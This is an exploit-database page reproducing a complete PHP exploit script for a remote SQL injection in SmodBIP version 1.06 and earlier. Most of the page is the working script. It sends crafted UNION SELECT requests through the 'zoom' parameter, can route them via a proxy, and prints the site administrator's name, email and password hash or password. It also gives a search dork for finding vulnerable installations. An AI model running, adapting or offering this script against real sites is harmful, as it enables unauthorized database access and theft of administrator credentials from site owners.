header-logo
Suggest Exploit
vendor:
SmodBIP
by:
Kacper
7.5
CVSS
HIGH
Remote SQL Injection
CWE
Product Name: SmodBIP
Affected Version From: SmodBIP <= 1.06
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

SmodBIP <= 1.06 (aktualnosci zoom) Remote SQL Injection Exploit

This exploit allows an attacker to perform remote SQL injection on SmodBIP version 1.06. The vulnerability is present in the aktualnosci zoom module. By exploiting this vulnerability, an attacker can execute arbitrary SQL queries on the target server.

Mitigation:

Upgrade to a patched version of SmodBIP.
Source

Exploit-DB raw data:

<?
/*
Autor: Kacper
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 

Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.

//dork: "SmodBIP" & "Aktualno.ci"

SmodBIP <= 1.06 (aktualnosci zoom) Remote SQL Injection Exploit
script homepage/download/demo: http://smod.pl/
*/
if ($argc<4) {
print_r('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host path aktualnosci_module_id OPTIONS
host:       target server (ip/hostname)
path:       SmodBIP path
aktualnosci_module_id: id number of aktualnosci module (Standard: 11)
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /SmodBIP/ 11
php '.$argv[0].' 127.0.0.1 /SmodBIP/ 11 -P1.1.1.1:80
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function wyslijpakiet($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$aktualnosci_id=$argv[3];
$port=80;
$proxy="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die("Bad path!");}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
print "SmodBIP SQL Injection Exploit by Kacper\r\n";
$packet ="POST ".$p."index.php?id=".$aktualnosci_id."&zoom=-1+UNION+SELECT+0,Imie,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/* HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$temp=explode('<h2>',$html);
$temp2=explode('</h2>',$temp[1]);
$imie_admina=$temp2[0];
echo "Admin Name: ".$imie_admina."\r\n";
$packet ="POST ".$p."index.php?id=".$aktualnosci_id."&zoom=-1+UNION+SELECT+0,Nazwisko,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/* HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$temp=explode('<h2>',$html);
$temp2=explode('</h2>',$temp[1]);
$nazwisko_admina=$temp2[0];
echo "Admin Surname: ".$nazwisko_admina."\r\n";
$packet ="POST ".$p."index.php?id=".$aktualnosci_id."&zoom=-1+UNION+SELECT+0,Email,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/* HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$temp=explode('<h2>',$html);
$temp2=explode('</h2>',$temp[1]);
$Email_admina=$temp2[0];
echo "Admin E-Mail: ".$Email_admina."\r\n";
$packet ="POST ".$p."index.php?id=".$aktualnosci_id."&zoom=-1+UNION+SELECT+0,Haslo,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/* HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$temp=explode('<h2>',$html);
$temp2=explode('</h2>',$temp[1]);
$haslo_admina=$temp2[0];
echo "Admin Password: ".$haslo_admina."\r\n";
?>

# milw0rm.com [2007-04-06]

Navigation

Suggest Exploit

Services By CQR